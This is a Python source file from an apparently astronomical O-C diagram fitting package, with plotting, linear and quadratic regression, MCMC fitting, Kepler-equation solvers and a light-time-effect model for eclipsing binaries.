weight - weight of data (shown as size of points)
trans_weight - transform weights to range (1,10)
bw - Black&White plot
double_ax - two axes -> time and epoch
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in same order as input data!
'''
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
ax1=fig.add_subplot(111)
#setting labels
if epoch and not double_ax:
ax1.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax1.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax1.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('Residue O - C (min)')
k=minutes
else:
ax1.set_ylabel('Residue O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
#primary / secondary minimum
if min_type:
prim=np.where(np.round(self.epoch)==self.epoch)
            sec=np.where(np.round(self.epoch)!=self.epoch)
else:
prim=np.arange(0,len(self.epoch),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
                warnings.warn('Shape of "weight" is different from shape of "time". Weights will be ignored!')
if bw: color='k'
else: color='b'
errors=GetMax(abs(self.new_oc),no_plot)
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
ax1.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.new_oc*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i])
if not len(sec)==0:
for i in range(len(w)):
ax1.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.new_oc*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err))
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.errorbar(x[prim],(self.new_oc*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5)
if not len(sec)==0:
ax1.errorbar(x[sec],(self.new_oc*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.plot(x[prim],(self.new_oc*k)[prim],color+'o',zorder=2)
if not len(sec)==0:
ax1.plot(x[sec],(self.new_oc*k)[sec],color+'o',
mfc='none',markeredgewidth=1,markeredgecolor=color,zorder=2)
if double_ax:
            #setting second axis
ax2=ax1.twiny()
#generate plot to obtain correct axis in epoch
l=ax2.plot(self.epoch,self.oc*k)
ax2.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self.t0)/self.P*2)/2.
ax2.set_xlim(epoch)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
def Plot(self,name=None,no_plot=0,no_plot_err=0,eps=False,oc_min=True,
time_type='JD',offset=2400000,trans=True,title=None,epoch=False,
min_type=False,weight=None,trans_weight=False,bw=False,double_ax=False,
fig_size=None):
'''plotting original O-C with linear fit
name - name of file to saving plot (if not given -> show graph)
        no_plot - number of outlier points that will not be plotted
        no_plot_err - number of points with the largest errors that will not be plotted
eps - save also as eps file
oc_min - O-C in minutes (if False - days)
time_type - type of JD in which is time (show in x label)
offset - offset of time
trans - transform time according to offset
title - name of graph
epoch - x axis in epoch
min_type - distinction of type of minimum
weight - weight of data (shown as size of points)
trans_weight - transform weights to range (1,10)
bw - Black&White plot
double_ax - two axes -> time and epoch
fig_size - custom figure size - e.g. (12,6)
warning: weights have to be in same order as input data!
'''
if fig_size:
fig=mpl.figure(figsize=fig_size)
else:
fig=mpl.figure()
ax1=fig.add_subplot(111)
#setting labels
if epoch and not double_ax:
ax1.set_xlabel('Epoch')
x=self.epoch
elif offset>0:
ax1.set_xlabel('Time ('+time_type+' - '+str(offset)+')')
if not trans: offset=0
x=self.t-offset
else:
ax1.set_xlabel('Time ('+time_type+')')
offset=0
x=self.t
if oc_min:
ax1.set_ylabel('O - C (min)')
k=minutes
else:
ax1.set_ylabel('O - C (d)')
k=1
if title is not None:
if double_ax: fig.subplots_adjust(top=0.85)
fig.suptitle(title,fontsize=20)
if not len(self.model)==len(self.t):
no_plot=0
#primary / secondary minimum
if min_type:
prim=np.where(np.round(self.epoch)==self.epoch)
            sec=np.where(np.round(self.epoch)!=self.epoch)
else:
prim=np.arange(0,len(self.epoch),1)
sec=np.array([])
#set weight
set_w=False
if weight is not None:
weight=np.array(weight)[self._order]
if trans_weight:
w_min=min(weight)
w_max=max(weight)
weight=9./(w_max-w_min)*(weight-w_min)+1
if weight.shape==self.t.shape:
w=[]
levels=[0,3,5,7.9,10]
size=[3,4,5,7]
for i in range(len(levels)-1):
w.append(np.where((weight>levels[i])*(weight<=levels[i+1])))
w[-1]=np.append(w[-1],np.where(weight>levels[-1])) #if some weight is bigger than max. level
set_w=True
else:
                warnings.warn('Shape of "weight" is different from shape of "time". Weights will be ignored!')
if bw: color='k'
else: color='b'
if len(self.new_oc)==len(self.oc): errors=GetMax(abs(self.new_oc),no_plot) #remove outlier points
else: errors=np.array([])
if set_w:
#using weights
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
for i in range(len(w)):
ax1.plot(x[prim[np.where(np.in1d(prim,w[i]))]],
(self.oc*k)[prim[np.where(np.in1d(prim,w[i]))]],color+'o',markersize=size[i],zorder=1)
if not len(sec)==0:
for i in range(len(w)):
ax1.plot(x[sec[np.where(np.in1d(sec,w[i]))]],
(self.oc*k)[sec[np.where(np.in1d(sec,w[i]))]],color+'o',markersize=size[i],
fillstyle='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
else:
#without weight
if self._set_err:
#using errors
if self._corr_err: err=self._old_err
else: err=self.err
errors=np.append(errors,GetMax(err,no_plot_err)) #remove errorful points
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.errorbar(x[prim],(self.oc*k)[prim],yerr=(err*k)[prim],fmt=color+'o',markersize=5,zorder=1)
if not len(sec)==0:
ax1.errorbar(x[sec],(self.oc*k)[sec],yerr=(err*k)[sec],fmt=color+'o',markersize=5,
fillstyle='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
else:
#without errors
prim=np.delete(prim,np.where(np.in1d(prim,errors)))
sec=np.delete(sec,np.where(np.in1d(sec,errors)))
if not len(prim)==0:
ax1.plot(x[prim],(self.oc*k)[prim],color+'o',zorder=1)
if not len(sec)==0:
ax1.plot(x[sec],(self.oc*k)[sec],color+'o',
mfc='none',markeredgewidth=1,markeredgecolor=color,zorder=1)
#plot linear model
if bw:
color='k'
lw=2
else:
color='r'
lw=1
if len(self.model)==len(self.t):
#model was calculated
if len(self.t)<1000:
dE=(self.epoch[-1]-self.epoch[0])/1000.
E=np.linspace(self.epoch[0]-50*dE,self.epoch[-1]+50*dE,1100)
else:
dE=(self.epoch[-1]-self.epoch[0])/len(self.epoch)
E=np.linspace(self.epoch[0]-0.05*len(self.epoch)*dE,self.epoch[-1]+0.05*len(self.epoch)*dE,int(1.1*len(self.epoch)))
tC=self._t0P[0]+self._t0P[1]*E
p=[]
if 'Q' in self.params:
#Quad Model
p.append(self.params['Q'])
p+=[self.params['P']-self._t0P[1],self.params['t0']-self._t0P[0]]
new=np.polyval(p,E)
if epoch and not double_ax: ax1.plot(E,new*k,color,linewidth=lw)
else: ax1.plot(tC+new-offset,new*k,color,linewidth=lw)
if double_ax:
            #setting second axis
ax2=ax1.twiny()
#generate plot to obtain correct axis in epoch
if len(self.model)==len(self.t): l=ax2.plot(E,new*k,zorder=2)
else: l=ax2.plot(self.epoch,self.oc*k,zorder=2)
ax2.set_xlabel('Epoch')
l.pop(0).remove()
lims=np.array(ax1.get_xlim())
epoch=np.round((lims-self.t0)/self.P*2)/2.
ax2.set_xlim(epoch)
if name is None: mpl.show()
else:
mpl.savefig(name+'.png')
if eps: mpl.savefig(name+'.eps')
mpl.close(fig)
class FitLinear(SimpleFit):
'''fitting of O-C diagram with linear function'''
def FitRobust(self,n_iter=10):
'''robust regression
return: new O-C'''
self.FitLinear()
for i in range(n_iter): self.FitLinear(robust=True)
self._robust=True
self._mcmc=False
return self.new_oc
def FitLinear(self,robust=False):
'''simple linear regression
return: new O-C'''
if robust:
err=self.err*np.exp(((self.oc-self.model)/(5*self.err))**4)
k=1
while np.inf in err:
k*=10
err=self.err*np.exp(((self.oc-self.model)/(5*k*self.err))**4)
else: err=self.err
w=1./err
p,cov=np.polyfit(self.epoch,self.oc,1,cov=True,w=w)
self.P=p[0]+self._t0P[1]
self.t0=p[1]+self._t0P[0]
self.params['P']=p[0]+self._t0P[1]
self.params['t0']=p[1]+self._t0P[0]
self.Epoch()
self.model=np.polyval(p,self.epoch)
self.chi=sum(((self.oc-self.model)/self.err)**2)
if robust:
n=len(self.t)*1.06*sum(1./err)/sum(1./self.err)
chi_m=1.23*sum(((self.oc-self.model)/err)**2)/(n-2)
else: chi_m=self.chi/(len(self.t)-2)
err=np.sqrt(chi_m*cov.diagonal())
self.params_err['P']=err[0]
self.params_err['t0']=err[1]
self.tC=self.t0+self.P*self.epoch
self.new_oc=self.oc-self.model
self._robust=False
self._mcmc=False
return self.new_oc
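#The iterative reweighting used by FitRobust/FitLinear above can be sketched
#standalone: residuals inflate the errors via exp(((o-c)/(5*err))**4), so
#outliers get negligible weight in the next np.polyfit pass. A minimal sketch
#on synthetic data (illustrative variable names, not part of this class):

```python
import numpy as np

np.random.seed(0)
epoch=np.arange(50.)
oc=1e-4*epoch+np.random.normal(0,1e-3,50)   #linear trend + noise
oc[10]+=0.02                                #one strong (20-sigma) outlier
err=np.full(50,1e-3)

p=np.polyfit(epoch,oc,1,w=1./err)           #initial weighted fit
for _ in range(10):
    model=np.polyval(p,epoch)
    err_r=err*np.exp(((oc-model)/(5*err))**4)   #inflate errors of outliers
    err_r[np.isinf(err_r)]=1e15                 #guard against overflow
    p=np.polyfit(epoch,oc,1,w=1./err_r)
```

#After a few passes the outlier carries essentially zero weight and the
#fitted slope and intercept recover the underlying linear ephemeris.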
def FitMCMC(self,n_iter,limits,steps,fit_params=None,burn=0,binn=1,visible=True,db=None):
'''fitting with Markov chain Monte Carlo
n_iter - number of MC iterations - should be at least 1e5
limits - limits of parameters for fitting
steps - steps (width of normal distribution) of parameters for fitting
fit_params - list of fitted parameters
burn - number of removed steps before equilibrium - should be approx. 0.1-1% of n_iter
binn - binning size - should be around 10
visible - display status of fitting
db - name of database to save MCMC fitting details (could be analysed later using InfoMCMC function)
'''
#setting pymc sampling for fitted parameters
if fit_params is None: fit_params=['P','t0']
vals0={'P': self._t0P[1], 't0': self._t0P[0]}
vals={}
pars={}
for p in ['P','t0']:
if p in self.params: vals[p]=self.params[p]
else: vals[p]=vals0[p]
if p in fit_params:
pars[p]=pymc.Uniform(p,lower=limits[p][0],upper=limits[p][1],value=vals[p])
def model_fun(**arg):
'''model function for pymc'''
if 'P' in arg: P=arg['P']
else: P=vals['P']
if 't0' in arg: t0=arg['t0']
else: t0=vals['t0']
return t0+P*self.epoch
#definition of pymc model
model=pymc.Deterministic(
eval=model_fun,
doc='model',
name='Model',
parents=pars,
trace=True,
plot=False)
#final distribution
if self._set_err or self._calc_err:
#if known errors of data -> normal/Gaussian distribution
y=pymc.Normal('y',mu=model,tau=1./self.err**2,value=self.t,observed=True)
else:
#if unknown errors of data -> Poisson distribution
#note: this may degrade the fitting performance; rather use the function CalcErr to obtain errors
y=pymc.Poisson('y',mu=model,value=self.t,observed=True)
#adding final distribution and sampling of parameters to model
Model=[y]
for v in pars.itervalues():
Model.append(v)
#create pymc object
if db is None: R=pymc.MCMC(Model)
else:
#saving MCMC fitting details
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
R=pymc.MCMC(Model,db='pickle',dbname=db)
#setting pymc method - distribution and steps
for p in pars:
R.use_step_method(pymc.Metropolis,pars[p],proposal_sd=steps[p],
proposal_distribution='Normal')
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
R.sample(iter=n_iter,burn=burn,thin=binn) #MCMC fitting/simulation
self.params_err={} #remove errors of parameters
for p in ['P','t0']:
#calculate values and errors of parameters and save them
if p in pars:
self.params[p]=R.stats()[p]['mean']
self.params_err[p]=R.stats()[p]['standard deviation']
else:
self.params[p]=vals[p]
self.params_err[p]='---'
print ''
R.summary() #summary of MCMC fitting
if not visible:
#hidden output
sys.stdout=out
f.close()
self.Epoch()
self.tC=self.params['t0']+self.params['P']*self.epoch
self.new_oc=self.t-self.tC
self.model=self.oc+self.new_oc
self.chi=sum(((self.oc-self.model)/self.err)**2)
self._robust=False
self._mcmc=True
return self.new_oc
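#The pymc Metropolis sampling used above can be sketched in plain numpy for
#the linear-ephemeris case: a toy random-walk Metropolis chain over (t0,P)
#with a Gaussian likelihood (synthetic data and hypothetical step sizes):

```python
import numpy as np

np.random.seed(1)
epoch=np.arange(30.)
t_obs=0.5+1.001*epoch+np.random.normal(0,0.01,30)   #synthetic minima times
err=0.01

def loglike(t0,P):
    #Gaussian log-likelihood of the linear ephemeris t0+P*epoch
    return -0.5*np.sum(((t_obs-(t0+P*epoch))/err)**2)

t0,P=0.4,1.0                     #starting values
ll=loglike(t0,P)
chain=[]
for _ in range(20000):
    t0n=t0+np.random.normal(0,0.005)     #normal proposals ~ "steps"
    Pn=P+np.random.normal(0,0.0005)
    lln=loglike(t0n,Pn)
    if np.log(np.random.rand())<lln-ll:  #Metropolis acceptance rule
        t0,P,ll=t0n,Pn,lln
    chain.append((t0,P))
burn=np.array(chain[5000:])              #discard burn-in
t0_mean,P_mean=burn.mean(axis=0)
```

#The posterior means play the role of R.stats()[p]['mean'] above; the chain
#standard deviations would give the parameter errors.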
class FitQuad(SimpleFit):
'''fitting of O-C diagram with quadratic function'''
def FitRobust(self,n_iter=10):
'''robust regression
return: new O-C'''
self.FitQuad()
for i in range(n_iter): self.FitQuad(robust=True)
self._robust=True
self._mcmc=False
return self.new_oc
def FitQuad(self,robust=False):
'''simple quadratic regression
return: new O-C'''
if robust:
err=self.err*np.exp(((self.oc-self.model)/(5*self.err))**4)
k=1
while np.inf in err:
k*=10
err=self.err*np.exp(((self.oc-self.model)/(5*k*self.err))**4)
else: err=self.err
p,cov=np.polyfit(self.epoch,self.oc,2,cov=True,w=1./err)
self.Q=p[0]
self.P=p[1]+self._t0P[1]
self.t0=p[2]+self._t0P[0]
self.params['Q']=p[0]
self.params['P']=p[1]+self._t0P[1]
self.params['t0']=p[2]+self._t0P[0]
self.Epoch()
self.model=np.polyval(p,self.epoch)
self.chi=sum(((self.oc-self.model)/self.err)**2)
if robust:
n=len(self.t)*1.06*sum(1./err)/sum(1./self.err)
chi_m=1.23*sum(((self.oc-self.model)/err)**2)/(n-3)
else: chi_m=self.chi/(len(self.t)-3)
err=np.sqrt(chi_m*cov.diagonal())
self.params_err['Q']=err[0]
self.params_err['P']=err[1]
self.params_err['t0']=err[2]
self.tC=self.t0+self.P*self.epoch+self.Q*self.epoch**2
self.new_oc=self.oc-self.model
self._robust=False
self._mcmc=False
return self.new_oc
def FitMCMC(self,n_iter,limits,steps,fit_params=None,burn=0,binn=1,visible=True,db=None):
'''fitting with Markov chain Monte Carlo
n_iter - number of MC iterations - should be at least 1e5
limits - limits of parameters for fitting
steps - steps (width of normal distribution) of parameters for fitting
fit_params - list of fitted parameters
burn - number of removed steps before equilibrium - should be approx. 0.1-1% of n_iter
binn - binning size - should be around 10
visible - display status of fitting
db - name of database to save MCMC fitting details (could be analysed later using InfoMCMC function)
'''
#setting pymc sampling for fitted parameters
if fit_params is None: fit_params=['Q','P','t0']
vals0={'P': self._t0P[1], 't0': self._t0P[0], 'Q':0}
vals={}
pars={}
for p in ['P','t0','Q']:
if p in self.params: vals[p]=self.params[p]
else: vals[p]=vals0[p]
if p in fit_params:
pars[p]=pymc.Uniform(p,lower=limits[p][0],upper=limits[p][1],value=vals[p])
def model_fun(**arg):
'''model function for pymc'''
if 'Q' in arg: Q=arg['Q']
else: Q=vals['Q']
if 'P' in arg: P=arg['P']
else: P=vals['P']
if 't0' in arg: t0=arg['t0']
else: t0=vals['t0']
return t0+P*self.epoch+Q*self.epoch**2
#definition of pymc model
model=pymc.Deterministic(
eval=model_fun,
doc='model',
name='Model',
parents=pars,
trace=True,
plot=False)
#final distribution
if self._set_err or self._calc_err:
#if known errors of data -> normal/Gaussian distribution
y=pymc.Normal('y',mu=model,tau=1./self.err**2,value=self.t,observed=True)
else:
#if unknown errors of data -> Poisson distribution
#note: this may degrade the fitting performance; rather use the function CalcErr to obtain errors
y=pymc.Poisson('y',mu=model,value=self.t,observed=True)
#adding final distribution and sampling of parameters to model
Model=[y]
for v in pars.itervalues():
Model.append(v)
#create pymc object
if db is None: R=pymc.MCMC(Model)
else:
#saving MCMC fitting details
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
R=pymc.MCMC(Model,db='pickle',dbname=db)
#setting pymc method - distribution and steps
for p in pars:
R.use_step_method(pymc.Metropolis,pars[p],proposal_sd=steps[p],
proposal_distribution='Normal')
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
R.sample(iter=n_iter,burn=burn,thin=binn) #MCMC fitting/simulation
self.params_err={} #remove errors of parameters
for p in ['Q','P','t0']:
#calculate values and errors of parameters and save them
if p in pars:
self.params[p]=R.stats()[p]['mean']
self.params_err[p]=R.stats()[p]['standard deviation']
else:
self.params[p]=vals[p]
self.params_err[p]='---'
print ''
R.summary() #summary of MCMC fitting
if not visible:
#hidden output
sys.stdout=out
f.close()
self.Epoch()
self.tC=self.params['t0']+self.params['P']*self.epoch+self.params['Q']*self.epoch**2
self.new_oc=self.t-self.tC
self.model=self.oc+self.new_oc
self.chi=sum(((self.oc-self.model)/self.err)**2)
self._robust=False
self._mcmc=True
return self.new_oc
class ComplexFit():
'''class with common function for OCFit and RVFit'''
def KeplerEQ(self,M,e,eps=1e-10):
'''solving Kepler's equation using the Newton-Raphson method
with the starting formula S9 given by Odell & Gooding (1986)
M - Mean anomaly (np.array, float or list) [rad]
e - eccentricity
(eps - accuracy)
output in rad in same format as M
'''
#if input is not np.array
len1=False
if isinstance(M,int) or isinstance(M,float):
#M is float
if M==0.: return 0.
M=np.array(M)
len1=True
lst=False
if isinstance(M,list):
#M is list
lst=True
M=np.array(M)
E0=M+e*np.sin(M)/np.sqrt(1-2*e*np.cos(M)+e**2) #starting formula S9
E=E0-(E0-e*np.sin(E0)-M)/(1-e*np.cos(E0))
while (abs(E-E0)>eps).any():
E0=E
E=E-(E-e*np.sin(E)-M)/(1-e*np.cos(E))
while (E<0).any(): E[np.where(E<0)]+=2*np.pi
while (E>2*np.pi).any(): E[np.where(E>2*np.pi)]-=2*np.pi
if len1: return E[0] #output is float
if lst: return list(E) #output is list
return E
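#The Newton-Raphson iteration above can be checked standalone; a minimal
#sketch using the same Odell & Gooding (1986) S9 starter, verifying that the
#returned E satisfies E - e*sin(E) = M (hypothetical helper name):

```python
import numpy as np

def kepler_newton(M,e,eps=1e-10):
    #Newton-Raphson for E - e*sin(E) = M with the S9 starting formula
    M=np.atleast_1d(np.asarray(M,dtype=float))
    E0=M+e*np.sin(M)/np.sqrt(1-2*e*np.cos(M)+e**2)   #starting formula S9
    E=E0-(E0-e*np.sin(E0)-M)/(1-e*np.cos(E0))
    while (abs(E-E0)>eps).any():
        E0=E
        E=E-(E-e*np.sin(E)-M)/(1-e*np.cos(E))
    return E

M=np.linspace(0.1,6.0,20)
E=kepler_newton(M,0.3)
resid=np.max(np.abs(E-0.3*np.sin(E)-M))   #residual of Kepler's equation
```
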
def KeplerEQMarkley(self,M,e):
'''solving Kepler Equation - Markley (1995): Kepler Equation Solver
M - Mean anomaly (np.array, float or list) [rad]
e - eccentricity
output in rad in same format as M
'''
#if input is not np.array
len1=False
if isinstance(M,int) or isinstance(M,float):
#M is float
if M==0.: return 0.
M=np.array(M)
len1=True
lst=False
if isinstance(M,list):
#M is list
lst=True
M=np.array(M)
pi2=np.pi**2
pi=np.pi
#handle inputs with M=0 or M=pi
M=M-(np.floor(M/(2*pi))*2*pi)
flip=np.where(M>pi)
M[flip]=2*pi-M[flip]
M_0=np.where(np.round_(M,14)==0)
M_pi=np.where(np.round_(M,14)==np.round_(pi,14))
alpha=(3.*pi2+1.6*pi*(pi-abs(M))/(1.+e))/(pi2-6.)
d=3*(1-e)+alpha*e
r=3*alpha*d*(d-1+e)*M+M**3
q=2*alpha*d*(1-e)-M**2
w=(abs(r)+np.sqrt(q**3+r**2))**(2./3.)
E1=(2*r*w/(w**2+w*q+q**2)+M)/d
s=e*np.sin(E1)
f0=E1-s-M
f1=1-e*np.cos(E1)
f2=s
f3=1-f1
f4=-f2
d3=-f0/(f1-0.5*f0*f2/f1)
d4=-f0/(f1+0.5*d3*f2+(d3**2)*f3/6.)
d5=-f0/(f1+0.5*d4*f2+d4**2*f3/6.+d4**3*f4/24.)
E=E1+d5
E[flip]=2*pi-E[flip]
E[M_0]=0.
E[M_pi]=pi
if len1: return E[0] #output is float
if lst: return list(E) #output is list
return E
def Epoch(self,t0,P,t=None):
'''convert time to epoch'''
if t is None: t=self.t
epoch=np.round((t-t0)/P*2)/2.
self.epoch=epoch
self._t0P=[t0,P]
self._min_type=np.abs((2*(epoch-epoch.astype('int'))).astype('int'))
return epoch
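#Epoch above rounds (t-t0)/P to the nearest half-integer, so secondary minima
#land on .5 epochs and min_type separates primary (0) from secondary (1)
#minima. A quick standalone check on synthetic times with small timing noise:

```python
import numpy as np

t0,P=2450000.0,1.234
#two primary minima (integer epochs) and two secondary (half-integer epochs)
t=t0+P*np.array([0.0,1.0,2.5,7.5])+np.array([0.001,-0.002,0.0005,0.0])
epoch=np.round((t-t0)/P*2)/2.                             #nearest half-integer
min_type=np.abs((2*(epoch-epoch.astype('int'))).astype('int'))  #0=primary, 1=secondary
```
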
def InfoGA(self,db,eps=False):
'''statistics about GA fitting'''
info=InfoGAClass(db)
path=db.replace('\\','/')
if path.rfind('/')>0: path=path[:path.rfind('/')+1]
else: path=''
info.Info(path+'ga-info.txt')
info.PlotChi2()
mpl.savefig(path+'ga-chi2.png')
if eps: mpl.savefig(path+'ga-chi2.eps')
for p in info.availableTrace:
info.Plot(p)
mpl.savefig(path+'ga-'+p+'.png')
if eps: mpl.savefig(path+'ga-'+p+'.eps')
mpl.close('all')
def InfoMCMC(self,db,eps=False,geweke=False):
'''statistics about MCMC fitting'''
info=InfoMCClass(db)
info.AllParams(eps)
for p in info.pars: info.OneParam(p,eps)
if geweke: info.Geweke(eps)
def LiTE(self,t,a_sin_i3,e3,w3,t03,P3):
'''model of O-C by Light-Time effect given by Irwin (1952)
t - times of minima (np.array or float) [days]
a_sin_i3 - semi-major axis of the eclipsing binary around the center of mass of the triple system [AU]
e3 - eccentricity of 3rd body
w3 - longitude of pericenter of 3rd body [rad]
P3 - period of 3rd body [days]
t03 - time of pericenter passage of 3rd body [days]
output in days
'''
M=2*np.pi/P3*(t-t03) #mean anomaly
if e3<0.9: E=self.KeplerEQ(M,e3) #eccentric anomaly
else: E=self.KeplerEQMarkley(M,e3)
nu=2*np.arctan(np.sqrt((1+e3)/(1-e3))*np.tan(E/2)) #true anomaly
dt=a_sin_i3*AU/c*((1-e3**2)/(1+e3*np.cos(nu))*np.sin(nu+w3)+e3*np.sin(w3))
return dt/day
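#The Irwin (1952) LiTE formula above can be evaluated standalone with the
#physical constants inlined (AU, c, day are module-level constants here) and a
#plain Newton Kepler solver; orbit values below are hypothetical:

```python
import numpy as np

AU=1.495978707e11   #astronomical unit [m]
c=299792458.0       #speed of light [m/s]
day=86400.0         #day [s]

def lite(t,a_sin_i3,e3,w3,t03,P3):
    M=2*np.pi/P3*(t-t03)                       #mean anomaly
    E=M.copy()
    for _ in range(50):                        #Newton iterations (moderate e3)
        E=E-(E-e3*np.sin(E)-M)/(1-e3*np.cos(E))
    nu=2*np.arctan(np.sqrt((1+e3)/(1-e3))*np.tan(E/2))   #true anomaly
    dt=a_sin_i3*AU/c*((1-e3**2)/(1+e3*np.cos(nu))*np.sin(nu+w3)+e3*np.sin(w3))
    return dt/day                              #O-C contribution in days

t=np.linspace(0.,5000.,1000)
oc=lite(t,2.0,0.3,1.0,0.0,3000.0)   #a_sin_i3=2 AU, e3=0.3, w3=1 rad, P3=3000 d
ptp=oc.max()-oc.min()               #peak-to-peak LiTE amplitude [days]
```

#The peak-to-peak value is about twice the semi-amplitude
#K3 = a_sin_i3/c * sqrt(1 - e3**2*cos(w3)**2) computed by Amplitude below.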
class OCFit(ComplexFit):
'''class for fitting O-C diagrams'''
def __init__(self,t,oc,err=None):
'''loading times, O-Cs, (errors)'''
self.t=np.array(t)
self.oc=np.array(oc)
if err is None:
#errors not given
self.err=np.ones(self.t.shape)
self._set_err=False
else:
#errors given
self.err=np.array(err)
self._set_err=True
#sorting data...
self._order=np.argsort(self.t)
self.t=self.t[self._order] #times
self.oc=self.oc[self._order] #O-Cs
self.err=self.err[self._order] #errors
self.limits={} #limits of parameters for fitting
self.steps={} #steps (width of normal distibution) of parameters for fitting
self.params={} #values of parameters, fixed values have to be set here
self.params_err={} #errors of fitted parameters
self.paramsMore={} #values of parameters calculated from model params
self.paramsMore_err={} #errors of calculated parameters
self.fit_params=[] #list of fitted parameters
self._calc_err=False #errors were calculated
self._corr_err=False #errors were corrected
self._old_err=[] #given errors
self.model='LiTE3' #used model of O-C
self._t0P=[] #linear ephemeris of binary
self.epoch=[] #epoch of binary
self.res=[] #residua = new O-C
self._min_type=[] #type of minima (primary=0 / secondary=1)
self.availableModels=['LiTE3','LiTE34','LiTE3Quad','LiTE34Quad',\
'AgolInPlanet','AgolInPlanetLin','AgolExPlanet',\
'AgolExPlanetLin','Apsidal'] #list of available models
def AvailableModels(self):
'''print available models for fitting O-Cs'''
print 'Available Models:'
for s in self.availableModels: print s
def ModelParams(self,model=None,allModels=False):
'''display parameters of model'''
def Display(model):
s=model+': '
if 'Quad' in model: s+='t0, P, Q, '
if 'Lin' in model: s+='t0, '
if 'LiTE' in model: s+='a_sin_i3, e3, w3, t03, P3, '
if '4' in model: s+='a_sin_i4, e4, w4, t04, P4, '
if 'InPlanet' in model: s+='P, a, w, e, mu3, r3, w3, t03, P3, '
if 'ExPlanet' in model: s+='P, mu3, e3, t03, P3, '
if 'Apsidal' in model: s+='t0, P, w0, dw, e, '
print s[:-2]
if model is None: model=self.model
if allModels:
for m in self.availableModels: Display(m)
else: Display(model)
def Save(self,path):
'''saving data, model, parameters... to file'''
data={}
data['t']=self.t
data['oc']=self.oc
data['err']=self.err
data['order']=self._order
data['set_err']=self._set_err
data['calc_err']=self._calc_err
data['corr_err']=self._corr_err
data['old_err']=self._old_err
data['limits']=self.limits
data['steps']=self.steps
data['params']=self.params
data['params_err']=self.params_err
data['paramsMore']=self.paramsMore
data['paramsMore_err']=self.paramsMore_err
data['fit_params']=self.fit_params
data['model']=self.model
data['t0P']=self._t0P
data['epoch']=self.epoch
data['min_type']=self._min_type
path=path.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('.')<=path.rfind('/'): path+='.ocf' #add extension, if missing
f=open(path,'wb')
pickle.dump(data,f,protocol=2)
f.close()
def Load(self,path):
'''loading data, model, parameters... from file'''
path=path.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('.')<=path.rfind('/'): path+='.ocf' #add extension, if missing
f=open(path,'rb')
data=pickle.load(f)
f.close()
self.t=data['t']
self.oc=data['oc']
self.err=data['err']
self._order=data['order']
self._set_err=data['set_err']
self._corr_err=data['corr_err']
self._calc_err=data['calc_err']
self._old_err=data['old_err']
self.limits=data['limits']
self.steps=data['steps']
self.params=data['params']
self.params_err=data['params_err']
self.paramsMore=data['paramsMore']
self.paramsMore_err=data['paramsMore_err']
self.fit_params=data['fit_params']
self.model=data['model']
self._t0P=data['t0P']
self.epoch=data['epoch']
self._min_type=data['min_type']
def AgolInPlanet(self,t,P,a,w,e,mu3,r3,w3,t03,P3):
'''model TTV - inner planet (Agol et al., 2005 - sec. 3)
t - times of minima = transits (np.array or float) [days]
P - period of transiting exoplanet [days]
a - semi-major axis of transiting exoplanet [AU]
w - longitude of periastron of transiting exoplanet [rad]
e - eccentricity of transiting exoplanet
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
r3 - radius of orbit of 3rd body [AU]
w3 - longitude of periastron of 3rd body [rad]
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
